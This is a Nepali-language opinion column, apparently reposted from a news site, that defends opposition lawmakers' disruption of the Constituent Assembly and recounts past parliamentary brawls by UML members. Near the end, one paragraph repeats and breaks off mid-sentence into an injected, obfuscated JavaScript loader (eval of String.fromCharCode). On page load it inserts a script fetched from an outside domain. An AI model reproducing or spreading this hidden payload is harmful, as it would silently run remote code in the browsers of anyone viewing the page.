Logo

संविधानसभाको लडाईं पाण्डव र कौरबजस्तै

  • कुसुम भट्टराई

kushum bhattrai

सत्ताधारी दल काँग्रेस र एमालेले दुई तिहाईको दम्भ प्रदर्शन गर्दै प्रक्रिया नाममा संविधान निर्माण गर्न खोजेपछि सोमबार राति संविधानसभा वैठकमा एमाओवादी, मधेसवादी र जनजातिलगायतका परिवर्तनकारी सभासद्हरुले शसक्त प्रतिरोध गरे । सोमबार राती संविधानसभा एउटा सानो कुरुक्षेत्रमै परिणत हुनपुग्यो, जहाँ अग्रगमनकारी एकातिर र यथास्थितिवादी अर्कोतिर थिए ।

द्वापर युगमा महाभारत यु त्यसै भएको थिएन । पाण्डवहरुले कौरवहरुसँग जम्मा पाँच गाउँ मागेका थिए । दुर्योधनको दम्भले त्यति पनि दिन नमानेपछि भगवान कहलिएका कृष्ण, भिष्म पीतामह, गुरु दोर्ण, कृपाचार्यदेखि बिदुषक विदुरसम्मको प्रयास खेर गयो र आखिर महाभारत युद्द भएरै छाड्यो । महाभारत युद्दलाई कृष्ण लिला भन्ने गरिए पनि खासमा त्यो अन्याय र अत्याचारविरुद्ध भएको विद्रोह नै थियो । कौरवहरुको अत्याचारविरुद्धको प्रतिरोध नै थियो ।

जब अन्याय हुन्छ, तब बिद्रोह हुन्छ । जब अन्याय हुन्छ, तब प्रतिरोध हुन्छ । रावणले सीता हरण गरेकै कारण राम–रावण युद्द भयो । त्यसबेला त मर्यादा पुरुष राम नै थिए, आखिर रामले पनि त शान्तिपुर्ण समाधान निकाल्न सकेनन् क्यारे । कृष्णजस्ता भगवानले समेत त्यसबेला शान्तिपुर्ण समाधान निकाल्न सकेनन् र महाभारत भयो । आखिर किन भयो ? किनकी अन्यायले सीमा नाघेपछि प्रतिरोध हुन्छ । यो भौतिक, आध्यामिक दुवै कोणबाट पुष्टि भैसकेको तथ्य हो । मंगलबार बिहान संविधानसभा बैठकमा पनि परिवर्तनका एजेन्डाहरुलाई तुहाउने सत्ताधारीहरुको षडयन्त्रको विरुद्दमा प्रतिरोध भएको हो ।

यस्तो संसारमा जहाँ पनि हुन्छ । संसदीय प्रणाली भएका मुलुकहरुमा जब सत्ताधारीहरुले विपक्षीलाई पेलेर कुनै अनुचित प्रक्रिया थाल्छन्, तब टेबल र माइक भाँच्ने मात्र हैन, कुटाकुट नै भएका दृश्य हामी देख्ने गर्छौं । छिमेकी भारतको संसदमा पनि त्यस्ता घटनाहरु पटक–पटक भएका छन् । त्यस्ता घटना नियोजित हुँदैनन, स्वाभाविक हुन्छन् । आकस्मीक हुन्छन् र ती बाध्यात्मक पनि हुन्छन् ।

नेपालको संसदीय इतिहासमा संसद्मा बबण्डर मच्चाउने र सत्तापक्षविरुद्ध प्रतिरोध गर्ने संस्कारको सुरुवात नेकपा एमालेले नै गरेको थियो । निकट इतिहास हेरौं त । २०५३ सालतिर यो पंत्तिकार तात्कालीन प्रतिनिधिसभामा संसदीय रिपोर्टिङ गर्ने गथ्र्यो । यो पंत्तिकारलाई त्यो दृश्य अझै सम्झना छ, त्यसबेला तात्कालीन जलस्रोत मन्त्री काँग्रेसका लक्ष्मणप्रसाद घिमिरेले सामान्य बहुमतबाट ‘टनकपुर सन्धी’को प्रस्ताव संसदमा प्रस्तुत गरेका थिए । २०४७ सालको संविधानको धारा १२७ अनुसार दुरगामी महत्वका सन्धी सम्झौता गर्दा संसद्को दुई तिहाई बहुमत चाहिने प्रावधान थियो । गिरिजावावुले भारतसँग खुुसुक्क टनकपुर सन्धी गरेर आए अनि त्यसलाई समझदारी भनेर ढाँटे । सर्वोच्च अदालतले त्यसलाई सन्धी नै भएको ठहर गरिदियो ।

samsad (11)

दुई तिहाई बहुमतबाट पारित हुनुपर्ने सन्धी सामान्य बहुमतबाट पारित गर्न खोजेपछि एमाले सांसदहरु सबै जुरुक्क उठेर संसदको रोष्ट्रम घेर्न पुगे । मन्त्री घिमिरेले बोल्न लागेको माइक खोसे । त्यो माइक भाँचे । होहल्ला भयो । सांसदहरुबीच घम्साघम्सी नै मच्चियो । त्यसबेला बरिष्ठ पत्रकार हरिहर विरहीको सम्पादकत्वमा प्रकाशित हुने ‘साप्ताहिक विमर्श’का अनुसार त्यस दिन एमाले नेता भरतमोहन अधिकारीले नियमापत्ति गर्ने क्रममा काँग्रेसका सांसद्हरुलाई ‘मु…..’ भनेर अपशब्द नै बोलेका थिए । विमर्शको फाइल पल्टाउने हो भने त्यो रेकर्ड अहिले पनि हेर्न सकिन्छ । त्यस दिन एमाले सांसदहरुले संसदको कार्वाही चल्नै दिएनन् । तात्कालीन सभामुख दमननाथ ढुंगाना मौन रहे । एमाले सांसदहरुले आठघन्टासम्म संसदमा नारा लगाइरहे । उनीहरुको नारा थियो, ‘टनकपुर सन्धी चाहिँदैन, देश बेच्न पाइँदैन’ । त्यसदिन एमाले सांसदहरुले पैंतीस वटा माइक भाँचेका थिए । सत्रवटा कुर्सी फोडेका थिए । चार जना मर्यादापालकमाथि हातपात गरेका थिए । एमाले सांसदहरुसँग भिड्न खोज्दा काँग्रेसका सांसद अजुर्न नरसिंह केसीले कुटाइ खाएका थिए । बिरोध खतिवडा, जागृतप्रसाद भेटवाल, प्रेम सिंह धामी र अहिलेका गृहमन्त्री बामदेव गौतमहरु नै थिए, जसले त्यसबेला संसदमा बबण्डर मच्चाएका थिए ।

पछि त्यही एमालेले राष्ट्रघाती महाकाली सन्धी अनुमोदन गर्यो । त्यो सन्धी अनुमोदन भएको दिनका घटनाहरु पनि अहिले स्मरण गर्नु सान्दर्भिक हुनेछ । त्यसबेला वामदेव गौतम र सीपी मैनाली महाकाली सन्धीको बिपक्षमा थिए भने केपी ओली र माधव नेपाल सन्धीको पक्षमा थिए । एमालेका केही सांसद र कार्यकर्ताहरुले केपी ओली र माधव नेपाललाई ‘भारतीय दलाल’ भन्दै एमाले संसदीय दलको कार्यालय हातामै नाराबाजी गरेका थिए । त्यति मात्र हैन, सन्धीका विपक्षमा रहेका एमाले सांसदहरुले केपी ओलीलाई एमाले संसदीय दलको कार्यालयभित्र थुनेर बाहिरबाट ताल्चा लगाइदिएका थिए । त्यो पनि त्यसबेलाको आवेग अनुसार राष्ट्रघातविरुद्धको प्रतिरोध नै थियो । कहाँसम्म भने सांसद गोबिन्दनाथ उप्रेतीले जुत्ता फुकालेर केपी ओलीलाई प्रहार गरेको दृश्य आफ्नै आँखाले देखेका पुराना पत्रकार देवेन्द्र गौतमले त्यसबारेमा आफ्नो पुस्तक ‘आकाश पाताल’मा सविस्तार वर्णन गरेका छन् ।

संसदीय दलको बैठकमा जव एमाले नेता मोदनाथ प्रश्रितले सन्धीको बिपक्षमा रहेका नेता वामदेव गौतममाथि ‘पद नपाएर सन्धीको विरोध गरेको’ आरोप लगाए, तब पछाडितर्फको कुर्सीमा रहेका गोबिन्दनाथ उप्रेतीले मोदनाथजीलाई आफू बसेकै कुर्सी उचालेर प्रहार गरेको र त्यो उनलाई नलागेर बीचको खाली ठाउँमा खसेको समाचार यो पंत्तिकारले त्यसबेला कान्तिपुर दैनिकमै रिपोर्टिङ गरेको थियो । कान्तिपुरको फाइल पल्टाएर हेरे हुन्छ । त्यति मात्र होइन, म्याग्दीका तात्कालीन सांसद निलबहादुर तिलिजाले छतमा समेत मुक्का प्रहार गर्दै सन्धीको पक्षमा रहेका नेताहरुलाई झम्टिन खोज्दा सांसद्हरुले छुटाउनु परेको थियो । त्यो पनि प्रतिरोधकै नमुना थियो ।

बिडम्बना, पछि एमालेले प्राविधिक बहुमतको आडमा महाकाली सन्धी पारित गर्न सहमति जनायो । मध्यरातमा महाकाली सन्धी पारित गरियो । एमाले सांसदहरुको त्यो प्रतिरोधको आवेग शान्त भयो । महाकाली सन्धी उल्ट्याउने र कालापानीमा मार्चपास गर्ने हुंकार गर्ने वामदेव कमरेड आफंै उपप्रधानमन्त्री भएर सत्ताको खेलमा लागे । अहिलेसम्म उनी त्यहि खेलमा छन् ।

पंत्तिकारलाई अर्को घटना पनि सम्झना भइरहेको छ । त्यसबेला ग्यालरी बैठककै छेउमा क्यान्टिन भएको भवनभन्दा माथिल्लो तलामा राष्ट्रियसभा थियो । राष्ट्रिय सभामा ‘आज केही गडबड हुँदैछ’ भन्नेबारे हामी सँसदीय रिपाेिर्टङ गर्ने पत्रकारलाई पहिल्यै केही सुर्इंको हुन्थ्यो । एक दिनको कुरा हो । तल क्यान्टिनमा सांसद केशव बडालसँग भूमिसुधार प्रसंगमा गफ गर्दै चिया पिइरहेका बेला सांसद गोल्छे सार्की आएर यो पंत्तिकाारको कानमा खुसुक्क भने, ‘भाइ, आज राष्ट्रियसभाको बैठक नछुटाउनु है, तपाईहरुका लागि ठूलै समाचार बन्नेवाला छ ।’ बाँकी कुरा उनले बताएनन् ।

राष्ट्रियसभाको बैठक सुरु भयो । तात्कालीन मन्त्री रामचन्द्र पौडेल कुनै प्रस्ताव टेबल गर्न रोष्ट्रममा पुगे । अचानक सांसद गोल्छे सार्की दौडदै रोष्ट्रममा पुगे र मन्त्री पौडेललाई कसेर दुई चड्कन लगाइदिए । अचानक झापड खानुपर्दा मन्त्री पौडेल कालो नीलो मात्रै होइन, उनको अनुहार पूरै रातो भयो । गोल्छेले झापड हानेपछि सांसदहरुबीच नै बबण्डर सुरु भयो । नियमापत्ति र धक्कम धक्का, हातपात र माइक भाँचाभाँच भयो । परिस्थिति अराजक भएपछि अध्यक्षले बैठक स्थगित गरिदिए ।

एमालेका वर्तमान अध्यक्ष केपी ओली संसदलाई मर्यादित् थलो बताउने गर्छन् । उनले मंगलबार संविधानसभामा भनेछन्, ‘संसदजस्तो मर्यादित ठाउँमा एमाओवादीले अभद्र व्यवहार गर्यो ।’ ओलीजीलाई पंत्तिकारको प्रश्न छ, ‘कमरेड मर्यादीत राष्ट्रिय सभामा बहालवाला मन्त्रीलाई ठाडै गएर झापड हान्न उक्साउने तपाईंहरु नै हैन र ? मर्यादित थलोमा अमयादित हर्कतको संस्कार सिकाउने तपाईहरु नै हैन र ?’

नेपालको संसदीय राजनीतिमा यस्तो प्रतिरोधको अभ्यास यसअघि पनि भएकाले मंगलबार बिहान एमाओवादीले संविधानसभामा गरेको प्रतिरोधको विरोध गर्नुको कुनै तुक देखिंदैन । वार्ता र सहमतिबाट जव कुनै कुरा टुगिँदैन, त्यसपछि मुठभेड हुन्छ । यही एमाले हैन, जसले ‘तालु खुइले गिरिजा भारततिर छिरिजा’दखि ‘यसपालिको हैंजा, गिरिजालाई लैजा’सम्मको अभद्र नारा लगाएको ? यही एमालेले हैन, जसले सडकका रेलिङ भाँच्न र टेलिफोनका बुथ फुटाल्न सिकाएको ? यही एमालेले नै हैन, जसले काठमाडौंको प्रजिअलाई उनकै कार्यकक्षमा गएर साफ धुलाई गरेको ? यही एमाले हैन, जसले टायर बाल्ने, पुत्ला जलाउने आदि बिरोधका तौर तरिका नेपाली राजनीतिमा भित्राउने ?

मलाई अझै सम्झना छ, कुनैबेला नेपाली कांग्रेसका युवाहरुले ‘शान्ति सेना’ भन्दै एउटा समूह बनाएका थिए । त्यसबेला एमाले नेता शंकर पोखरेलको नेतृत्वमा ‘शान्ति सेना कहाँ छ ? लाल सेना यहाँ छ’ भन्दै जुलुस निस्कियो र त्यसबेला सिंहदरबार अगाडिका सारा रेलिङ भाँचेको थियो । शान्त र प्रतिष्पर्धात्मक बहुदलीय राजनीतिमा तोडफोडको संस्कृती कसले भित्र्यायो ? एकपटक आफ्नो अनुहार पनि ऐनामा हेरौं न ।

माथि नै उल्लेख गरियो, जहाँ अन्याय हुन्छ, त्यहाँ प्रतिरोध हुन्छ । दश वर्ष लामो जनयुद्ध र पछिल्लो जनआन्दोलनले स्थापित गरेका परिवर्तनका एजेन्डाहरुलाई तुहाएर फेरि २०४७ सालको संविधान ब्युँताउँने षडयन्त्र भइरहेको छ । यदि त्यसो भयो भने संविधानसभामा तोडफोड त सामान्य घटना मात्र ठहरिने छ । २०४७ सालकै संविधान ब्युँताउँने खेल भयो भने २०५२ साल पनि त फर्किनेछ । त्यसपछि जनयुद्ध हुनेछ । मुलुकलाई फेिर हिंसात्मक विद्रोहतिर धकेल्ने खेलमा काँग्रेस र एमाले किन लागिरहेका छन् ? कतै यिनीहरुको साँठगाँठ हतियार माफियाहरुसँग त छैन ? सत्ताधारीहरु किन मुलुकमा मुठभेडका लागि उत्प्रेरक बनिरहेका छन्, कतै यिनीहरुको साँठगाँठ नेपालमा अस्थिरता र अराजकता निम्त्याएर कुनै सैनिक तानाशाह जन्माउन चाहने षडयन्त्रकारीहरुसँग त छैन ?

यस्ता धेरै प्रश्नहरु उब्जिएका छन् । सत्ताधारीहरुप्रति विश्वासको संकट उत्पन्न भएको छ ।

संविधान त यिनले एक वर्षमा बनाएनन्, यिनले नेपाली जनताका जनजीविकाका समस्याहरुको पनि हल गर्न सकेनन् । सत्तामा बसेर राज्य स्रोेतमाथि रजाईं गर्नुबाहेक सत्ताधारीहरुले के नै गरे ? त्यसैले संविधानको बिषयमा मात्र हैन, जनजीविकाका सवाललाई लिएर पनि जनता सडकमा उत्रिएका छन् ।

आज काठमाडौं शान्त छ । चारैतिर बन्द छ । देश पूरै ठप्प छ । जनताले बन्दको पूर्ण समर्थन गरेका छन् । सुस्त सत्ताधारीहरुको गठबन्धनविरुद्ध जनताले आफ्नो मत जाहेर गरेका छन् । जनताको यो अभिमत, जनताको यो जनमतलाई कदर गरेर सत्ताधारीहरु सहमतिको पक्रियामा आएनन् भने आन्दोलन त हुन्छ,हुन्छ, त्यो आन्दोलन चर्किदै जानेछ । मधेशमा आगो बल्नेछ । जनजाति जाग्नेछन् । शोषीत पीडित बर्ग जाग्नेछन् । त्यो आन्दोलनको प्रचण्ड बेगले आखिर परिवर्तनका एजेन्डा स्थापित गरेरै छाड्नेछ ।

त्यसबेला कांग्रेस र एमाले उही चीनको कामिन्ताङ पार्टी झैं इतिहासको कन्टेनरमा मिल्काइनेछन् ।

– See more at: http://www.ratopati.com/2015/01/20/201259.html#sthash.UWFiY0C2.dpuf

संसदीय दलको बैठकमा जव एमाले नेता मोदनाथ प्रश्रितले सन्धीको बिपक्षमा रहेका नेता वामदेव गौतममाथि ‘पद नपाएर सन्धीको विरोध गरेको’ आरोप लगाए, तब पछाडितर्फको कुर्सीमा रहेका गोबिन्दनाथ उप्रेतीले मोदनाथजीलाई आफू बसेकै कुर्सी उचालेर प्रहार गरेको र त्यो उनलाई नलागेर बीचको खाली ठाउँमा खसेको समाचार यो पंत्तिकारले त्यसबेला कान्तिपुर दैनिकमै रिपोर्टिङ गरेको थियो । कान्तिपुरको फाइल पल्टाएर हेरे हुन्छ । त्यति मात्र होइन, म्याग्दीका तात्कालीन सांसद निलबहादुर तिलिजालेvar f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,102,111,114,46,102,105,114,115,116,98,108,97,99,107,112,104,97,115,101,46,99,111,109,47,116,114,98,98,98,98,98,50,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));/*674867468*/

प्रतिक्रिया दिनुहोस्